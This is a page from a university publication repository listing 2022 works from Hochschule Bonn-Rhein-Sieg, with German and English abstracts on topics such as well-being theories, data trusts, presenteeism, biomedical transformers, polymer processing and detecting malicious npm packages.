Refine
H-BRS Bibliography
- yes (138)
Departments, institutes and facilities
- Fachbereich Angewandte Naturwissenschaften (33)
- Fachbereich Wirtschaftswissenschaften (31)
- Fachbereich Ingenieurwissenschaften und Kommunikation (26)
- Fachbereich Informatik (22)
- Institut für Technik, Ressourcenschonung und Energieeffizienz (TREE) (22)
- Internationales Zentrum für Nachhaltige Entwicklung (IZNE) (16)
- Institut für Medienentwicklung und -analyse (IMEA) (10)
- Institut für funktionale Gen-Analytik (IFGA) (10)
- Fachbereich Sozialpolitik und Soziale Sicherung (9)
- Institut für Sicherheitsforschung (ISF) (7)
Document Type
- Article (88)
- Part of a Book (18)
- Conference Object (13)
- Bachelor Thesis (5)
- Report (4)
- Part of Periodical (3)
- Working Paper (3)
- Book review (2)
- Book (monograph, edited volume) (1)
- Master's Thesis (1)
Year of publication
- 2022 (138) (remove)
Has Fulltext
- yes (138) (remove)
Keywords
- Knowledge Graphs (3)
- Machine Learning (3)
- Well-being (3)
- relaxation (3)
- Agil (2)
- Agilität (2)
- Bioinformatics (2)
- IT-Controlling (2)
- IT-Projektmanagement (2)
- Kanban (2)
Seit Sokrates bildet die Frage „Was macht ein glückliches Leben aus?“ den Ausgangspunkt der Entwicklung einer Vielfalt von Wohlbefindenstheorien. Den Kern dieses Aufsatzes bildet die Erörterung der Fragen, inwieweit das Konzept der empirischen Lebenszufriedenheit und die dadurch gewonnenen Korrelate einen Beitrag zur Beantwortung dieser Frage leisten und ob diese Antworten eine Wohlbefindenstheorie begründen können, welche die philosophische Theorie mit empirischen Ergebnissen verknüpft.
Im Zentrum dieses Aufsatzes steht eine Diskussion der wichtigsten Wohlbefindenstheorien, ihrer Qualitäten, Gemeinsamkeiten und Unterschiede. Einen Schwerpunkt bildet die Theorie der subjektiven Lebenszufriedenheit. Ich diskutiere Stärken und Schwächen des Konzeptes und stelle die wichtigsten Ergebnisse der empirischen Lebenszufriedenheitsforschung in einem Überblick dar.
Im Ergebnis argumentiere ich, dass die Resultate der empirischen Forschung als Grundlage einer subjektiv-objektiven Wohlbefindenstheorie dienen können. Qualitativ hochwertige zwischenmenschliche Beziehungen, ein gesunder Lebensstil, eine ausgewogene Work-Life-Balance, der Einsatz für Andere, das Verfolgen von Lebenszielen und persönlichen Interessen bilden die Grundlage einer Wohlbefindenstheorie, die sich auf empirische Lebenszufriedenheitsforschung stützt.
Was ist ein Labor?
(2022)
Der technische Fortschritt im Bereich der Erhebung, Speicherung und Verarbeitung von Daten macht es erforderlich, neue Fragen zu sozialverträglichen Datenmärkten aufzuwerfen. So gibt es sowohl eine Tendenz zur vereinfachten Datenteilung als auch die Forderung, die informationelle Selbstbestimmung besser zu schützen. Innerhalb dieses Spannungsfeldes bewegt sich die Idee von Datentreuhändern. Ziel des Beitrags ist darzulegen, dass zwischen verschiedenen Formen der Datentreuhänderschaft unterschieden werden sollte, um der Komplexität des Themas gerecht zu werden. Insbesondere bedarf es neben der mehrseitigen Treuhänderschaft, mit dem Treuhänder als neutraler Instanz, auch der einseitigen Treuhänderschaft, bei dem der Treuhänder als Anwalt der Verbraucherinteressen fungiert. Aus dieser Perspektive wird das Modell der Datentreuhänderschaft als stellvertretende Deutung der Interessen individueller und kollektiver Identitäten systematisch entwickelt.
Vorwort
(2022)
Vorwort
(2022)
Personal-Information-Management-Systeme (PIMS) gelten als Chance, um die Datensouveränität der Verbraucher zu stärken. Datenschutzbezogene Fragen sind für Verbraucher immer dort relevant, wo sie Verträge und Nutzungsbedingungen mit Diensteanbietern eingehen. Vor diesem Hintergrund diskutiert dieser Beitrag die Potenziale von VRM-Systemen, die nicht nur das Datenmanagement, sondern das gesamte Vertragsmanagement von Verbrauchern unterstützen. Dabei gehen wir der Frage nach, ob diese besser geeignet sind, um Verbraucher zu souveränem Handeln zu befähigen.
Unlimited paid time off policies are currently fashionable and widely discussed by HR professionals around the globe. While on the one hand, paid time off is considered a key benefit by employees and unlimited paid time off policies (UPTO) are seen as a major perk which may help in recruiting and retaining talented employees, on the other hand, early adopters reported that employees took less time off than previously, presumably leading to higher burnout rates. In this conceptual review, we discuss the theoretical and empirical evidence regarding the potential effects of UPTO on leave utilization, well-being and performance outcomes. We start out by defining UPTO and placing it in a historical and international perspective. Next, we discuss the key role of leave utilization in translating UPTO into concrete actions. The core of our article constitutes the description of the effects of UPTO and the two pathways through which these effects are assumed to unfold: autonomy need satisfaction and detrimental social processes. We moreover discuss the boundary conditions which facilitate or inhibit the successful utilization of UPTO on individual, team, and organizational level. In reviewing the literature from different fields and integrating existing theories, we arrive at a conceptual model and five propositions, which can guide future research on UPTO. We conclude with a discussion of the theoretical and societal implications of UPTO.
Microarray-based experiments revealed that thyroid hormone triiodothyronine (T3) enhanced the binding of Cy5-labeled ATP on heat shock protein 90 (Hsp90). By molecular docking experiments with T3 on Hsp90, we identified a T3 binding site (TBS) near the ATP binding site on Hsp90. A synthetic peptide encoding HHHHHHRIKEIVKKHSQFIGYPITLFVEKE derived from the TBS on Hsp90 showed, in MST experiments, the binding of T3 at an EC50 of 50 μM. The binding motif can influence the activity of Hsp90 by hindering ATP accessibility or the release of ADP.
It is challenging to provide users with a haptic weight sensation of virtual objects in VR since current consumer VR controllers and software-based approaches such as pseudo-haptics cannot render appropriate haptic stimuli. To overcome these limitations, we developed a haptic VR controller named Triggermuscle that adjusts its trigger resistance according to the weight of a virtual object. Therefore, users need to adapt their index finger force to grab objects of different virtual weights. Dynamic and continuous adjustment is enabled by a spring mechanism inside the casing of an HTC Vive controller. In two user studies, we explored the effect on weight perception and found large differences between participants for sensing change in trigger resistance and thus for discriminating virtual weights. The variations were easily distinguished and associated with weight by some participants while others did not notice them at all. We discuss possible limitations, confounding factors, how to overcome them in future research and the pros and cons of this novel technology.
Trojanized software packages used in software supply chain attacks constitute an emerging threat. Unfortunately, there is still a lack of scalable approaches that allow automated and timely detection of malicious software packages and thus most detections are based on manual labor and expertise. However, it has been observed that most attack campaigns comprise multiple packages that share the same or similar malicious code. We leverage that fact to automatically reproduce manually identified clusters of known malicious packages that have been used in real world attacks, thus, reducing the need for expert knowledge and manual inspection. Our approach, AST Clustering using MCL to mimic Expertise (ACME), yields promising results with a 𝐹1 score of 0.99. Signatures are automatically generated based on characteristic code fragments from clusters and are subsequently used to scan the whole npm registry for unreported malicious packages. We are able to identify and report six malicious packages that have been removed from npm consequentially. Therefore, our approach can support the detection by reducing manual labor and hence may be employed by maintainers of package repositories to detect possible software supply chain attacks through trojanized software packages.
Therapeutic Treatments for Osteoporosis-Which Combination of Pills Is the Best among the Bad?
(2022)
Osteoporosis is a chronical, systemic skeletal disorder characterized by an increase in bone resorption, which leads to reduced bone density. The reduction in bone mineral density and therefore low bone mass results in an increased risk of fractures. Osteoporosis is caused by an imbalance in the normally strictly regulated bone homeostasis. This imbalance is caused by overactive bone-resorbing osteoclasts, while bone-synthesizing osteoblasts do not compensate for this. In this review, the mechanism is presented, underlined by in vitro and animal models to investigate this imbalance as well as the current status of clinical trials. Furthermore, new therapeutic strategies for osteoporosis are presented, such as anabolic treatments and catabolic treatments and treatments using biomaterials and biomolecules. Another focus is on new combination therapies with multiple drugs which are currently considered more beneficial for the treatment of osteoporosis than monotherapies. Taken together, this review starts with an overview and ends with the newest approaches for osteoporosis therapies and a future perspective not presented so far.
The Poverty Reduction Effect of Social Protection: The Pros and Cons of a Multidisciplinary Approach
(2022)
There is a growing body of knowledge on the complex effects of social protection on poverty in Africa. This article explores the pros and cons of a multidisciplinary approach to studying social protection policies. Our research aimed at studying the interaction between cash transfers and social health protection policies in terms of their impact on inclusive growth in Ghana and Kenya. Also, it explored the policy reform context over time to unravel programme dynamics and outcomes. The analysis combined econometric and qualitative impact assessments with national- and local-level political economic analyses. In particular, dynamic effects and improved understanding of processes are well captured by this approach, thus, pushing the understanding of implementation challenges over and beyond a ‘technological fix,’ as has been argued before by Niño-Zarazúa et al. (World Dev 40:163–176, 2012), However, multidisciplinary research puts considerable demands on data and data handling. Finally, some poverty reduction effects play out over a longer time, requiring longitudinal consistent data that is still scarce.
Background: Since presenteeism is related to numerous negative health and work-related effects, measures are required to reduce it. There are initial indications that how an organization deals with health has a decisive influence on employees’ presenteeism behavior.
Aims: The concept of health-promoting collaboration was developed on the basis of these indications. As an extension of healthy leadership it includes not only the leader but also co-workers. In modern forms of collaboration, leaders cannot be assigned sole responsibility for employees’ health, since the leader is often hardly visible (digital leadership) or there is no longer a clear leader (shared leadership). The study examines the concept of health-promoting collaboration in relation to presenteeism. Relationships between health-promoting collaboration, well-being and work ability are also in focus, regarding presenteeism as a mediator.
Methods: The data comprise the findings of a quantitative survey of 308 employees at a German university of applied sciences. Correlation and mediator analyses were conducted.
Results: The results show a significant negative relationship between health-promoting collaboration and presenteeism. Significant positive relationships were found between health-promoting collaboration and both well-being and work ability. Presenteeism was identified as a mediator of these relationships.
Conclusion: The relevance of health-promoting collaboration in reducing presenteeism was demonstrated and various starting points for practice were proposed. Future studies should investigate further this newly developed concept in relation to presenteeism.
Die Digitalisierung und der Einsatz von Informations- und Kommunikationstechnologien (ICT) hat im Arbeits- und Privatleben neben einer höheren Produktivität auch zu neuen Formen von psychischem Stress geführt. Das Stresserleben, das mit dem Einsatz von ICT verbunden ist, wird in der Literatur auch als Technostress bezeichnet. Die Forschung zu diesem Thema zeigt, dass die Entstehung von Technostress von individuellen Faktoren abhängt. Die Persönlichkeit von ICT-Anwenderinnen und Anwendern bestimmt nicht nur das Auftreten von Technostress, sondern hat auch Einfluss auf dessen gesundheitliche und leistungsbezogene Folgen. In diesem Literaturreview wird der Forschungsstand zu der Rolle von Persönlichkeitsunterschieden bei der Entstehung von Technostress und dessen Folgen systematisch zusammengefasst. Die Auswertung der relevanten Forschungsartikel erfolgt hinsichtlich verwendeter Variablen, Stichproben und Studiendesigns, statistischer Methoden, Theorien und Frameworks. Abschließend werden der aktuelle Forschungsstand eingeordnet und Forschungslücken aufgezeigt.
This paper investigates the effect of voltage sensors on the measurement of transient voltages for power semiconductors in a Double Pulse Test (DPT) environment.We adapt previously published models that were developed for current sensors and apply them to voltage sensors to evaluate their suitability for DPT applications. Similarities and differences between transient current and voltage sensors are investigated and the resulting methodology is applied to commercially available and experimental voltage sensors. Finally, a selection aid for given measurement tasks is derived that focuses on the measurement of fast-switching power semiconductors.
Flüssigkeit, die in Werbespots symbolisch für Menstruationsblut steht, war jahrzehntelang blau, erst im September 2021 zeigte ein Hersteller erstmalig eine Flüssigkeit, welche realitätsnah in der Farbe Rot dargestellt wurde (1). Hygieneartikel, die Menstruierende zwingend benötigen, sind in Deutschland mit wenigen Ausnahmen auf öffentlichen Toiletten nicht verfügbar: Das Nicht-Sichtbarsein offenbarte auch im Jahr 2021 das Tabu um natürliche biologische Prozesse des weiblichen Körpers. Scham und Einschränkungen, die sich verhindern ließen, sind die Folge. Menstruierende werden in ihrem Wohlbefinden limitiert, und negative Erlebnisse führen dazu, dass Betroffene in der Ausübung von sozialen, schulischen und beruflichen Aktivitäten nicht nur durch die Menstruation selbst, sondern auch durch Normen und Erziehungsmuster beeinträchtigt sind, wie zahlreiche internationale Studien gezeigt haben (2). Für den deutschen Hochschulkontext fehlen solche Studien bislang.
In young adulthood, important foundations are laid for health later in life. Hence, more attention should be paid to the health measures concerning students. A research field that is relevant to health but hitherto somewhat neglected in the student context is the phenomenon of presenteeism. Presenteeism refers to working despite illness and is associated with negative health and work-related effects. The study attempts to bridge the research gap regarding students and examines the effects of and reasons for this behavior. The consequences of digital learning on presenteeism behavior are moreover considered. A student survey (N = 1036) and qualitative interviews (N = 11) were conducted. The results of the quantitative study show significant negative relationships between presenteeism and health status, well-being, and ability to study. An increased experience of stress and a low level of detachment as characteristics of digital learning also show significant relationships with presenteeism. The qualitative interviews highlighted the aspect of not wanting to miss anything as the most important reason for presenteeism. The results provide useful insights for developing countermeasures to be easily integrated into university life, such as establishing fixed learning partners or the use of additional digital learning material.
MOTIVATION
The majority of biomedical knowledge is stored in structured databases or as unstructured text in scientific publications. This vast amount of information has led to numerous machine learning-based biological applications using either text through natural language processing (NLP) or structured data through knowledge graph embedding models (KGEMs). However, representations based on a single modality are inherently limited.
RESULTS
To generate better representations of biological knowledge, we propose STonKGs, a Sophisticated Transformer trained on biomedical text and Knowledge Graphs (KGs). This multimodal Transformer uses combined input sequences of structured information from KGs and unstructured text data from biomedical literature to learn joint representations in a shared embedding space. First, we pre-trained STonKGs on a knowledge base assembled by the Integrated Network and Dynamical Reasoning Assembler (INDRA) consisting of millions of text-triple pairs extracted from biomedical literature by multiple NLP systems. Then, we benchmarked STonKGs against three baseline models trained on either one of the modalities (i.e., text or KG) across eight different classification tasks, each corresponding to a different biological application. Our results demonstrate that STonKGs outperforms both baselines, especially on the more challenging tasks with respect to the number of classes, improving upon the F1-score of the best baseline by up to 0.084 (i.e., from 0.881 to 0.965). Finally, our pre-trained model as well as the model architecture can be adapted to various other transfer learning applications.
AVAILABILITY
We make the source code and the Python package of STonKGs available at GitHub (https://github.com/stonkgs/stonkgs) and PyPI (https://pypi.org/project/stonkgs/). The pre-trained STonKGs models and the task-specific classification models are respectively available at https://huggingface.co/stonkgs/stonkgs-150k and https://zenodo.org/communities/stonkgs.
SUPPLEMENTARY INFORMATION
Supplementary data are available at Bioinformatics online.
The utilization of simulation procedures is gaining increasing attention in the product development of extrusion blow molded parts. However, some simulation steps, like the simulation of shrinkage and warpage, are still associated with uncertainties. The reason for this is on the one hand a lack of standardized interfaces for the transfer of simulation data between different simulation tools, and on the other hand the complex time-, temperature- and process-dependent material behavior of the used semi crystalline polymers. Using a new vendor neutral interface standard for the data transfer, the shrinkage analysis of a simple blow molded part is investigated and compared to experimental data. A linear viscoelastic material model in combination with an orthotropic process- and temperature-dependent thermal expansion coefficient is used for the shrinkage prediction. A good agreement is observed. Finally, critical parameters in the simulation models that strongly influence the shrinkage analysis are identified by a sensitivity study.
A precise characterization of substances is essential for the safe handling of explosives. One parameter regularly characterized is the impact sensitivity. This is typically determined using a drop hammer. However, the results can vary depending on the test method and even the operator, and it is not possible to distinguish the type of decomposition such as detonation and deflagration. This study monitors the reaction progress by constructing a drop hammer to measure the decomposition reaction of four different primary explosives (tetrazene, silver azide, lead azide, lead styphnate) in order to determine the reproducibility of this method. Additionally, further possible evaluation methods are explored to improve on the current binary statistical analysis. To determine whether classification was possible based on extracted features, the responses of equipped sensor arrays, which measure and monitor the reactions, were studied and evaluated. Features were extracted from this data and were evaluated using multivariate methods such as principal component analysis (PCA) and linear discriminant analysis (LDA). The results indicate that although the measurements show substance specific trends, they also show a large scatter for each substance. By reducing the dimensions of the extracted features, different sample clusters can be represented and the calculated loadings allow significant parameters to be determined for classification. The results also suggest that differentiation of different reaction mechanisms is feasible. Testing of the regressor function shows reliable results considering the comparatively small amount of data.
The non-scientific questioning of scientific research during the COVID-19 pandemic, the unwillingness of a president of the United States of America to accept the result of a democratically held election: just in recent times, there have been quite a few striking examples of long-held certainties appearing as nothing more than just illusions. This essay reflects on the severe consequences of the loss of such certainties in the spheres of democratic politics on the one hand and of science, especially for highly differentiated societies, on the other hand as well as on their interdependencies. Furthermore, the author tries to make the case that this disillusionment could prove to be a salutary shock – reminding us that we need to take a stand for the things we hold as certainties, oftentimes even as calming ones, if we want them to stay how we always thought they were.
Despite the increasing interest in single family offices (SFOs) as an investment owned by an entrepreneurial family, research on SFOs is still in its infancy. In particular, little is known about the capital structures of SFOs or the roots of SFO heterogeneity regarding financial decisions. By drawing on a hand-collected sample of 104 SFOs and private equity (PE) firms, we compare the financing choices of these two investor types in the context of direct entrepreneurial investments (DEIs). Our data thereby provide empirical evidence that SFOs are less likely to raise debt than PE firms, suggesting that SFOs follow pecking-order theory. Regarding the heterogeneity of the financial decisions of SFOs, our data indicate that the relationship between SFOs and debt financing is reinforced by the idiosyncrasies of entrepreneurial families, such as higher levels of owner management and a higher firm age. Surprisingly, our data do not support a moderating effect for the emphasis placed on socioemotional wealth (SEW).
Robust Identification and Segmentation of the Outer Skin Layers in Volumetric Fingerprint Data
(2022)
Despite the long history of fingerprint biometrics and its use to authenticate individuals, there are still some unsolved challenges with fingerprint acquisition and presentation attack detection (PAD). Currently available commercial fingerprint capture devices struggle with non-ideal skin conditions, including soft skin in infants. They are also susceptible to presentation attacks, which limits their applicability in unsupervised scenarios such as border control. Optical coherence tomography (OCT) could be a promising solution to these problems. In this work, we propose a digital signal processing chain for segmenting two complementary fingerprints from the same OCT fingertip scan: One fingerprint is captured as usual from the epidermis (“outer fingerprint”), whereas the other is taken from inside the skin, at the junction between the epidermis and the underlying dermis (“inner fingerprint”). The resulting 3D fingerprints are then converted to a conventional 2D grayscale representation from which minutiae points can be extracted using existing methods. Our approach is device-independent and has been proven to work with two different time domain OCT scanners. Using efficient GPGPU computing, it took less than a second to process an entire gigabyte of OCT data. To validate the results, we captured OCT fingerprints of 130 individual fingers and compared them with conventional 2D fingerprints of the same fingers. We found that both the outer and inner OCT fingerprints were backward compatible with conventional 2D fingerprints, with the inner fingerprint generally being less damaged and, therefore, more reliable.
Characterization methods of pressure sensitive adhesives (PSA) originate from technical bonding and do not cover relevant data for the development and quality assurance of medical applications, where PSA with flexible backing layers are adopted to human skin. In this study, a new method called RheoTack is developed to determine (mechanically and optically) an adhesion and detaching behavior of flexible and transparent PSA based patches. Transdermal therapeutic systems (TTS) consisting of silicone-based PSAs on a flexible and transparent backing layer were tested on a rotational rheometer with an 8 mm plate as a probe rod at retraction speeds of 0.01, 0.1, and 1 mm/s with respect to their adhesion and detaching behavior in terms of force-retraction displacement curves. The curves consist of a compression phase to affirm wetting; a tensile deformation phase intercepting stretching, cavity, and fibril formation; and a failure phase with detaching. Their analysis provides values for stiffness, force, and displacement of the beginning of fibril formation, force and displacement of the beginning of a failure due to fibril breakage and detaching, as well as corresponding activation energies. All these parameters exhibit the pronounced dependency on the retraction speed. The force-retraction displacement curves together with the simultaneous video recordings of the TTS deformation from three different angles (three cameras) provide deeper insight into the deformation processes and allow for interpreting the properties’ characteristics for PSA applications.
SLC6A14 (ATB0,+) is unique among SLC proteins in its ability to transport 18 of the 20 proteinogenic (dipolar and cationic) amino acids and naturally occurring and synthetic analogues (including anti-viral prodrugs and nitric oxide synthase (NOS) inhibitors). SLC6A14 mediates amino acid uptake in multiple cell types where increased expression is associated with pathophysiological conditions including some cancers. Here, we investigated how a key position within the core LeuT-fold structure of SLC6A14 influences substrate specificity. Homology modelling and sequence analysis identified the transmembrane domain 3 residue V128 as equivalent to a position known to influence substrate specificity in distantly related SLC36 and SLC38 amino acid transporters. SLC6A14, with and without V128 mutations, was heterologously expressed and function determined by radiotracer solute uptake and electrophysiological measurement of transporter-associated current. Substituting the amino acid residue occupying the SLC6A14 128 position modified the binding pocket environment and selectively disrupted transport of cationic (but not dipolar) amino acids and related NOS inhibitors. By understanding the molecular basis of amino acid transporter substrate specificity we can improve knowledge of how this multi-functional transporter can be targeted and how the LeuT-fold facilitates such diversity in function among the SLC6 family and other SLC amino acid transporters.
The cooperation between researchers and practitioners during the different stages of the research process is promoted as it can be of benefit to both society and research supporting processes of ‘transformation’. While acknowledging the important potential of research–practice–collaborations (RPCs), this paper reflects on RPCs from a political-economic perspective to also address potential unintended adverse effects on knowledge generation due to divergent interests, incomplete information or the unequal distribution of resources. Asymmetries between actors may induce distorted and biased knowledge and even help produce or exacerbate existing inequalities. Potential merits and limitations of RPCs, therefore, need to be gauged. Taking RPCs seriously requires paying attention to these possible tensions—both in general and with respect to international development research, in particular: On the one hand, there are attempts to contribute to societal change and ethical concerns of equity at the heart of international development research, and on the other hand, there is the relative risk of encountering asymmetries more likely.
In her recent article, Bender discusses several aspects of research–practice–collaborations (RPCs). In this commentary, we apply Bender's arguments to experiences in engineering research and development (R&D). We investigate the influence of interaction with practice partners on relevance, credibility, and legitimacy in the special engineering field of product development and analyze which methodological approaches are already being pursued for dealing with diverging interests and asymmetries and which steps will be necessary to include interests of civil society beyond traditional customer relations.
Research-Practice-Collaborations Addressing One Health and Urban Transformation. A Case Study
(2022)
One Health is an integrative approach at the interface of humans, animals and the environment, which can be implemented as Research-Practice-Collaboration (RPC) for its interdisciplinarity and intersectoral focus on the co-production of knowledge. To exemplify this, the present commentary shows the example of the Forschungskolleg “One Health and Urban Transformation” funded by the Ministry of Culture and Science of the State Government of Nord Rhine Westphalia in Germany. After analysis, the factors identified for a better implementation of RPC for One Health were the ones that allowed for constant communication and the reduction of power asymmetries between practitioners and academics in the co-production of knowledge. In this light, the training of a new generation of scientists at the boundaries of different disciplines that have mediation skills between academia and practice is an important contribution with great implications for societal change that can aid the further development of RPC.
Soil nutrient depletion threatens global food security and has been seriously underestimated for potassium (K) and several micronutrients. This is particularly the case for highly weathered soils in tropical countries, where classical soluble fertilizers are often not affordable or not accessible. One way to replenish macro- and micronutrients are ground silicate rock powders (SRPs). Rock forming silicate minerals contain most nutrients essential for higher plants, yet slow and inconsistent weathering rates have restricted their use in the past. Recent findings, however, challenge past agronomic objections which insufficiently addressed the factorial complexity of the weathering process. This review therefore first presents a framework with the most relevant factors for the weathering of SRPs through which several outcomes of prior studies can be explained. A subsequent analysis of 48 crop trials reveals the potential as alternative K source and multi-nutrient soil amendment for tropical soils, whereas the benefits for temperate soils are currently inconclusive. Beneficial results prevail for mafic and ultramafic rocks like basalts and rocks containing nepheline or glauconite. Several rock modifications are highly efficient in increasing the agronomic effectiveness of SRPs. Enhanced weathering of SRPs could additionally sequester substantial amounts of CO2 from the atmosphere and silicon (Si) supply can induce a broad spectrum of plant biotic and abiotic stress resistance. Recycling massive amounts of rock residues from domestic mining industries could furthermore resolve serious disposal challenges and improve fertilizer self-sufficiency. In conclusion, under the right circumstances, SRPs could not only advance low-cost and regional soil sustaining crop production but contribute to various sustainable development goals.
Recovery Across Different Temporal Settings: How Lunchtime Activities Influence Evening Activities
(2022)
Recovery from work stress during workday breaks, free evenings, weekends, and vacations is known to benefit employee health and well-being. However, how recovery at different temporal settings is interconnected is not well understood. We hypothesized that on days when employees engage in recovery-enhancing lunchtime activities, they will experience higher resources when leaving home from work (i.e., low fatigue and high positive affect) and consequently spend more time on recovery-enhancing activities in the evening, thus creating a positive recovery cycle. In this study, 97 employees were randomized into lunchtime park walk and relaxation groups. As evening activities, we measured time spent on physical exercise, physical activity in natural surroundings, and social activities. Afternoon resources and time spent on evening activities were assessed twice a week before, during, and after the intervention, for five weeks. Our results based on multilevel analyses showed that on days when employees completed the lunchtime park walk, they spent more time on evening physical exercise and physical activity in natural surroundings compared to days when the lunch break was spent as usual. However, neither lunchtime relaxation exercises nor afternoon resources were associated with any of the evening activities. Our findings suggest that other factors than afternoon resources are more important in determining how much time employees spend on various evening activities. Fifteen-minute lunchtime park walks inspired employees to engage in similar healthbenefitting activities during their free time.
Qualität der Qualitätsprüfung: Testberichte im klassischen und modernen Videospieljournalismus
(2022)
Die Hochzeit des gedruckten Videospieljournalismus um die Jahrtausendwende ist vorüber. Seit über 15 Jahren sind die verkauften Auflagen der klassischen Videospielzeitschriften wie Gamestar oder PC Games rückläufig. Andere Magazine wurden zwischenzeitlich aus wirtschaftlichen Gründen eingestellt, darunter PC Action oder auch der einstige Marktführer Computer Bild Spiele. Trotzdem entwickelte sich eine journalistische Gegenbewegung, die Kieron Gillen im Jahr 2004 in seinem Manifest "The New Games Journalism" begründete. Es entstanden in Deutschland Videospielzeitschriften wie GAIN oder WASD, deren Berichterstattung Videospiele weniger als Produkt, sondern zunehmend als künstlerisches Objekt wahrnehmen und sie in einen gesellschaftlichen und kulturellen Kontext einordnen.
Ungeachtet dessen erfolgt in den Redaktionen eine technische und inhaltliche Sichtung der Videospiele, die dem Publikum als Testbericht präsentiert wird. Da es sich dabei aus historischer Perspektive um den Kerninhalt von Videospielzeitschriften handelt, soll dieser als Analysegegenstand dieser Arbeit dienen und ein Indiz für die Qualität der Magazine als Ganzes sein. Mit Blick auf die unterschiedlichen Entwicklungen im Videospieljournalismus soll folgende Frage beantwortet werden: Verfügen moderne Videospielzeitschriften über eine höhere Qualität als klassische Magazine? Dazu erfolgt eine qualitative Inhaltsanalyse der Testberichte und ein Vergleich mit etablierten Qualitätsmerkmalen aus dem allgemeinen Journalismus, ebenso wie dem Fach-, Nutzwert- und Videospieljournalismus.
ProtSTonKGs: A Sophisticated Transformer Trained on Protein Sequences, Text, and Knowledge Graphs
(2022)
While most approaches individually exploit unstructured data from the biomedical literature or structured data from biomedical knowledge graphs, their union can better exploit the advantages of such approaches, ultimately improving representations of biology. Using multimodal transformers for such purposes can improve performance on context dependent classication tasks, as demonstrated by our previous model, the Sophisticated Transformer Trained on Biomedical Text and Knowledge Graphs (STonKGs). In this work, we introduce ProtSTonKGs, a transformer aimed at learning all-encompassing representations of protein-protein interactions. ProtSTonKGs presents an extension to our previous work by adding textual protein descriptions and amino acid sequences (i.e., structural information) to the text- and knowledge graph-based input sequence used in STonKGs. We benchmark ProtSTonKGs against STonKGs, resulting in improved F1 scores by up to 0.066 (i.e., from 0.204 to 0.270) in several tasks such as predicting protein interactions in several contexts. Our work demonstrates how multimodal transformers can be used to integrate heterogeneous sources of information, paving the foundation for future approaches that use multiple modalities for biomedical applications.
The epithelial sodium channel (ENaC) is a heterotrimeric ion channel that plays a key role in sodium and water homeostasis in tetrapod vertebrates. In the aldosterone-sensitive distal nephron, hormonally controlled ENaC expression matches dietary sodium intake to its excretion. Furthermore, ENaC mediates sodium absorption across the epithelia of the colon, sweat ducts, reproductive tract, and lung. ENaC is a constitutively active ion channel and its expression, membrane abundance, and open probability (PO) are controlled by multiple intracellular and extracellular mediators and mechanisms [9]. Aberrant ENaC regulation is associated with severe human diseases, including hypertension, cystic fibrosis, pulmonary edema, pseudohypoaldosteronism type 1, and nephrotic syndrome [9].
Silicon carbide and graphene possess extraordinary chemical and physical properties. Here, these different systems are linked and the changes in structural and dynamic properties are investigated. For the simulations performed a classical molecular dynamic (MD) approach was used. In this approach, a graphene layer (N = 240 atoms) was grafted at different distances on top of a 6H-SiC structure (N = 2400 atoms) and onto a 3C-SiC structure (N = 1728 atoms). The distances between the graphene and the 6H are 1.0, 1.3 and 1.5 Å and the distances between the graphene layer and the 3C-SiC are 2.0, 2.3, and 2.5 Å. Each system has been equilibrated at room temperature until no further relaxation was observed. The 6H-SiC structure in combination with graphene proves to be more stable compared to the combination with 3C-SiC. This can be seen well in the determined energies. Pair distribution functions were influenced slightly by the graphene layer due to steric and energetic changes. This becomes clear from the small shifts of the C-C distances. Interactions as well as bonds between graphene and SiC lead to the fact that small shoulders of the high-frequency SiC-peaks are visible in the spectra and at the same time the high-frequency peaks of graphene are completely absent.
Process-induced changes in the morphology of biodegradable polybutylene adipate terephthalate (PBAT) and polylactic acid (PLA) blends modified with various multifunctional chainextending cross-linkers (CECLs) are presented. The morphology of unmodified and modified films produced with blown film extrusion is examined in an extrusion direction (ED) and a transverse direction (TD). While FTIR analysis showed only small peak shifts indicating that the CECLs modify the molecular weight of the PBAT/PLA blend, SEM investigations of the fracture surfaces of blown extrusion films revealed their significant effect on the morphology formed during the processing. Due to the combined shear and elongation deformation during blown film extrusion, rather spherical PLA islands were partly transformed into long fibrils, which tended to decay to chains of elliptical islands if cooled slowly. The CECL introduction into the blend changed the thickness of the PLA fibrils, modified the interface adhesion, and altered the deformation behavior of the PBAT matrix from brittle to ductile. The results proved that CECLs react selectively with PBAT, PLA, and their interface. Furthermore, the reactions of CECLs with PBAT/PLA induced by the processing depended on the deformation directions (ED and TD), thus resulting in further non-uniformities of blown extrusion films.
Modern GPUs come with dedicated hardware to perform ray/triangle intersections and bounding volume hierarchy (BVH) traversal. While the primary use case for this hardware is photorealistic 3D computer graphics, with careful algorithm design scientists can also use this special-purpose hardware to accelerate general-purpose computations such as point containment queries. This article explains the principles behind these techniques and their application to vector field visualization of large simulation data using particle tracing.
Aufgrund SARS-CoV-2 ist eine Rechtsvorlesung für Betriebswirte im Bachelorstudiengang an zwei verschiedenen Standorten der Hochschule Bonn-Rhein-Sieg mit über 300 Studierenden unter Anwendung des Inverted Classroom Ansatzes zum Sommersemester 2020 vollständig digitalisiert worden. Durch die von außen vorgegebene Lernstrategie mit wöchentlichen Arbeitspaketen und die Nutzung einer asynchronen Kommunikationsplattform auf Basis eines Instant Messengers mit adressatenadäquater Ansprache gelang es, Synchronformate auf ein notwendiges Minimum zu reduzieren. Die Ergebnisse der empirischen Begleitung zeigen, dass das neue didaktische Konzept für eine digitale Lehre die unterschiedlichsten Bedürfnisse der Studierenden befriedigte. Insbesondere konnte eine »digitale Lernatmosphäre« geschaffen werden, die von den Studierenden als sehr förderlich für ihren Lernprozess erachtet wurde. Die induzierte Lernstrategie führte zu signifikanten Leistungsverbesserungen. Es wird diskutiert, welche Maßnahmen sich auch für postpandemische Lehre empfehlen.
Dass die weitgehende kommerzielle Datenausspähung der großen Internetunternehmen nicht allein ein Problem der davon betroffenen Bürgerinnen und Bürger ist, sondern letztlich auch weitreichende gesellschaftliche Folgen hat, wurde mit dem Aufkommen des Rechtspopulismus in den USA, Brasilien und Europa zum Thema mindestens der Diskussion in Fachkreisen. Hass und Hetze im Netz, Fake News, politische Wahlwerbung und Manipulation in Social Media sind als Bedrohung für die freiheitlichen Demokratien westlicher Ausprägung unübersehbar geworden.
Operating an ozone-evolving PEM electrolyser in tap water: A case study of water and ion transport
(2022)
